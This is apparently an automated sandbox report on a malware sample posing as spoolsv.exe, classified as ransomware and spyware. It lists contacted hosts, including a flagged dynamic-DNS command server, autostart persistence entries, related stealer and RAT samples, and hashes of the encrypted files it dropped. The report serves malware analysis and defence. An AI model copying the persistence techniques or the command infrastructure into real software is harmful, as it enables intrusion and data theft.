                                                                                                                                                                                    		high
                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Completionattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/trustattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://tempuri.org/Entity/Id10attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://tempuri.org/Entity/Id11attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://tempuri.org/Entity/Id12attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://tempuri.org/Entity/Id16Responseattzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancelattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    http://tempuri.org/Entity/Id13attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://tempuri.org/Entity/Id14attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://tempuri.org/Entity/Id15attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          http://tempuri.org/Entity/Id16attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://www.savings.com/m/p/32073281/12104416/c?afsrc=1&up=2022-10-24-16-43&auto_show_edge_shopping_spoolsv.exe, 00000000.00000002.3717823961.0000000005E7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/Nonceattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                http://tempuri.org/Entity/Id17attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://tempuri.org/Entity/Id18attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    http://tempuri.org/Entity/Id5Responseattzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      http://tempuri.org/Entity/Id19attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsattzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          http://tempuri.org/Entity/Id10Responseattzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/Renewattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              http://tempuri.org/Entity/Id8Responseattzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                https://api.retailmenot.com/security/public/out/5V4O3ZVBGJBZLEJTSCCWGL5B4Y?marketingcampaign=5V4O3ZVspoolsv.exe, 00000000.00000002.3717823961.0000000005E7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeyattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		high

                                                                                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                                                                                  Public IPs

                                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                  208.95.112.1
                                                                                                                                                                                                                                  		ip-api.comUnited States
                                                                                                                                                                                                                                  		53334TUT-ASUSfalse
                                                                                                                                                                                                                                  149.154.167.220
                                                                                                                                                                                                                                  		api.telegram.orgUnited Kingdom
                                                                                                                                                                                                                                  		62041TELEGRAMRUfalse
                                                                                                                                                                                                                                  78.70.235.238
                                                                                                                                                                                                                                  		f8terat.ddns.netSweden
                                                                                                                                                                                                                                  		3301TELIANET-SWEDENTeliaCompanySEtrue

                                                                                                                                                                                                                                  General Information

                                                                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                  Analysis ID:1570972
                                                                                                                                                                                                                                  Start date and time:2024-12-08 15:06:10 +01:00
                                                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                  Overall analysis duration:0h 10m 51s
                                                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                  Number of analysed new started processes analysed:30
                                                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                                                  Sample name:spoolsv.exe
                                                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                                                  Classification:mal100.rans.troj.spyw.evad.winEXE@24/1044@3/3
                                                                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                                                                  • Successful, ratio: 22.2%
                                                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                                                                  • Number of executed functions: 142
                                                                                                                                                                                                                                  • Number of non-executed functions: 45
                                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                                                                                  Warnings

                                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): www.bing.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7752 because it is empty
                                                                                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 8024 because it is empty
                                                                                                                                                                                                                                  • Execution Graph export aborted for target spoolsv.exe, PID 2040 because it is empty
                                                                                                                                                                                                                                  • Execution Graph export aborted for target spoolsv.exe, PID 3968 because it is empty
                                                                                                                                                                                                                                  • Execution Graph export aborted for target spoolsv.exe, PID 5924 because it is empty
                                                                                                                                                                                                                                  • Execution Graph export aborted for target spoolsv.exe, PID 6212 because it is empty
                                                                                                                                                                                                                                  • Execution Graph export aborted for target spoolsv.exe, PID 7656 because it is empty
                                                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                  • VT rate limit hit for: spoolsv.exe

                                                                                                                                                                                                                                  Simulations

                                                                                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                                                                  09:07:18API Interceptor49x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                  10:33:17API Interceptor4222619x Sleep call for process: spoolsv.exe modified
                                                                                                                                                                                                                                  10:34:36API Interceptor22x Sleep call for process: attzwu.exe modified
                                                                                                                                                                                                                                  16:33:19Task SchedulerRun new task: spoolsv path: C:\Users\user~1\AppData\Local\Temp\spoolsv.exe
                                                                                                                                                                                                                                  16:33:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run spoolsv C:\Users\user~1\AppData\Local\Temp\spoolsv.exe
                                                                                                                                                                                                                                  16:33:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run spoolsv C:\Users\user~1\AppData\Local\Temp\spoolsv.exe
                                                                                                                                                                                                                                  16:33:35AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spoolsv.lnk

                                                                                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                                                                                  IPs

                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  208.95.112.1BA9qyj2c9G.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                                                                                                                                                                  • ip-api.com/line?fields=query,country
                                                                                                                                                                                                                                  xooSsYaHN0.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                                                                                                                                                                                                  • ip-api.com/json
                                                                                                                                                                                                                                  ea4LTmpMwl.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                                                                                                                  • ip-api.com/json/
                                                                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                  • ip-api.com/json/
                                                                                                                                                                                                                                  file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                                                                                                                  • ip-api.com/json/
                                                                                                                                                                                                                                  u7e3vb5dfk.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                                  a9YMw44iQq.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                  • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                                  ozgpPwVAu1.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                                  PG4w1WB9dE.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                  • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                                  a4BE6gJooT.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                                  149.154.167.220BA9qyj2c9G.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                                                                                                                                                                    ea4LTmpMwl.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                        INVOICES.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                          file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                                                                                                                            INQUIRY REQUEST AND PRICES_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                              RFQ Order list #2667747.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                                Payment Details Ref#577767.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                                  IBAN Payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                                    ozgpPwVAu1.exeGet hashmaliciousXWormBrowse

                                                                                                                                                                                                                                                      Domains

                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      ip-api.comBA9qyj2c9G.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                                      xooSsYaHN0.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                                      ea4LTmpMwl.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                                      u7e3vb5dfk.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                                      a9YMw44iQq.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                                      ozgpPwVAu1.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                                      PG4w1WB9dE.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                                      a4BE6gJooT.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                                      api.telegram.orgBA9qyj2c9G.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      ea4LTmpMwl.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      INVOICES.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      INQUIRY REQUEST AND PRICES_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      Bank Swift and SOA PRN00720031415453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      RFQ Order list #2667747.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      Payment Details Ref#577767.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      IBAN Payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      f8terat.ddns.netVKpQDpvEkh.exeGet hashmaliciousAveMaria, UACMeBrowse
                                                                                                                                                                                                                                                      • 213.65.233.25
                                                                                                                                                                                                                                                      m90dF9Nbdm.exeGet hashmaliciousEagle RAT, QuasarBrowse
                                                                                                                                                                                                                                                      • 213.65.233.25
                                                                                                                                                                                                                                                      default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comQ8o0Mx52Fd.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 217.20.58.98
                                                                                                                                                                                                                                                      Q8o0Mx52Fd.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 217.20.58.99
                                                                                                                                                                                                                                                      3qvTuHPZz2.exeGet hashmaliciousMeduza StealerBrowse
                                                                                                                                                                                                                                                      • 217.20.58.99
                                                                                                                                                                                                                                                      zZeXr4mg0S.exeGet hashmaliciousLokibotBrowse
                                                                                                                                                                                                                                                      • 217.20.58.99
                                                                                                                                                                                                                                                      YnViC5yHLu.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 217.20.58.99
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                      • 217.20.58.100
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                      • 217.20.58.98
                                                                                                                                                                                                                                                      Fw 2025 Employee Handbook For all Colhca Employees Ref THEFUE.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 217.20.58.100
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                      • 217.20.58.100
                                                                                                                                                                                                                                                      bcUcEm7AqP.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                                                                                                      • 217.20.58.101

                                                                                                                                                                                                                                                      ASNs

                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      TELEGRAMRUBA9qyj2c9G.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      ea4LTmpMwl.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      new.ini.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 149.154.164.13
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      INVOICES.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      INQUIRY REQUEST AND PRICES_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      RFQ Order list #2667747.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      Payment Details Ref#577767.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      IBAN Payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      TUT-ASUSBA9qyj2c9G.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                                      xooSsYaHN0.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                                      ea4LTmpMwl.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                                      u7e3vb5dfk.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                                      a9YMw44iQq.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                                      ozgpPwVAu1.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                                      PG4w1WB9dE.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                                      a4BE6gJooT.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                                      TELIANET-SWEDENTeliaCompanySEbuild.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                                      • 78.70.235.238
                                                                                                                                                                                                                                                      meerkat.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                      • 90.230.133.78
                                                                                                                                                                                                                                                      meerkat.arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                      • 147.13.236.157
                                                                                                                                                                                                                                                      jmhgeojeri.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 147.13.249.90
                                                                                                                                                                                                                                                      jmhgeojeri.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 2.252.178.113
                                                                                                                                                                                                                                                      akcqrfutuo.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 90.232.44.27
                                                                                                                                                                                                                                                      home.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                                                                      • 2.251.105.70
                                                                                                                                                                                                                                                      home.arm.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                                                                      • 78.64.30.110
                                                                                                                                                                                                                                                      jew.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                      • 90.230.39.157
                                                                                                                                                                                                                                                      arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 95.193.59.249

                                                                                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0eBA9qyj2c9G.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      List of required items.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      List of Required items and specifications.pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      8AE6w4efXi.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      ea4LTmpMwl.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      YWFMFVCSun.batGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      8AE6w4efXi.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      7rTjhbfF6L.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220

                                                                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.97661778933988
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:FMunq0C6jaLb6ZZguK4ItfndMuNWwMzADxLDHcgV:5njCyUGXMHtfDMEDxvHR
                                                                                                                                                                                                                                                      MD5:2798A665A62E62501D40B84497A22258
                                                                                                                                                                                                                                                      SHA1:BDBB563D0E68ABAA9DB93C3813922D7DFEB6B38D
                                                                                                                                                                                                                                                      SHA-256:0A3FBE27E19924BF319D53269420451594779E0FA76AAD9D4A2116A9A2C6AE7D
                                                                                                                                                                                                                                                      SHA-512:E5A173B827803BB21159982547FB55899593475494A79BB3F480FCBB5B331493EE787CC03E372D981EF2B9222F1B82EE131AE9EE8FE44FB0CEEDF44D3B520629
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....xQ..5.]..rH..........U..^.)T.G./..e ......m.`J....... .nH..>{BI!.5[;...J'.(U...A.5..4*1.l......H`..."..../_.q~.TA.K.........f~t^.o.mPZZY._...(...>R..l:U...I...;..M].^P..5..P#V.:....Bv....)..|...BN...KpZ._...\....0..V.78a.#....s./....L.W.oX./q...q.Q.....B_Er..o.v........Yv...`xV9;W.)..?@.DmK.....eL!A...2]}'7.....H\....."T:l6.{.......L9u...4..[.o...Q...W....*..5O.uP&.5`..s.;'...d....)f24....H6..{.........!C.3X..B..V.'c....p..?..:...K.V,G.[....p...`x$Q=S[...n...t..@..C.K..TW9..TqR....z.]......|......5....p.[.~..FRn.m..aAN..o.Nf.7.G.....W...`qm*.es...^.J@K...$..#.S...8nF....7.K`..`..Y;..1.....L.s.Q.W...-qZ.U....s.7(...V...7x..F.y.........B,...w..0...m....._..W.g1...*..=.3.sL.T.tn..Q....GEj.;..v.....D...+k.}7.....n.h>y....7.4.G{.....dC.uY.G... ..<.&V;....c......Iv..A..=~#.fa....$.n.q...D....I........u...{..\..G:..N7...gI_)..<>............lXI...PJ...H.rxJn...l.`............q.I..?.kQ..,.^....`.BXor;.o..Y.........E..2o......}A..^_..K7/..7...'...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3145744
                                                                                                                                                                                                                                                      Entropy (8bit):7.999942085456931
